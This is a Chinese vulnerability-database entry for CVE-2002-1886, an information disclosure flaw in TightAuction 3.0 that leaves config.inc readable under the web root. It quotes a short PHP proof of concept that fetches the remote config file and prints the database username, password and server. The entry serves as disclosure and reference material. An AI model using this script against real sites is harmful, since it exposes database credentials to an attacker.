TightAuction Config.INC信息泄露漏洞

TightAuction Config.INC信息泄露漏洞

漏洞ID 1107019 漏洞类型 配置错误
发布时间 2002-10-02 更新时间 2005-10-20
图片[1]-TightAuction Config.INC信息泄露漏洞-安全小百科CVE编号 CVE-2002-1886
图片[2]-TightAuction Config.INC信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200212-555
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21893
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-555
|漏洞详情
TightAuction3.0版本在带有不足访问控制的web文档根下储存config.inc,远程攻击者可以借助该漏洞获得数据库用户名和密码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5850/info

TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted.


<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : n n");
print("Login : $DB_Username nPassword : $DB_Password nServer :
$DB_Database");
?>
|参考资料

来源:BID
名称:5850
链接:http://www.securityfocus.com/bid/5850
来源:XF
名称:tightauction-config-information-disclosure(10310)
链接:http://www.iss.net/security_center/static/10310.php
来源:BUGTRAQ
名称:20021002MultipleWebSecurityHoles
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0016.html

相关推荐: Solaris Recursive mutex_enter Panic Vulnerability

Solaris Recursive mutex_enter Panic Vulnerability 漏洞ID 1104598 漏洞类型 Unknown 发布时间 1999-09-23 更新时间 1999-09-23 CVE编号 N/A CNNVD-ID N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享